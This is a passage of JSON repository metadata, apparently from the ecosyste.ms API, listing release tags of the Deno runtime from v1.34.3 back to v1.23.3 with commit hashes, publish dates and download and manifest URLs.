_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosy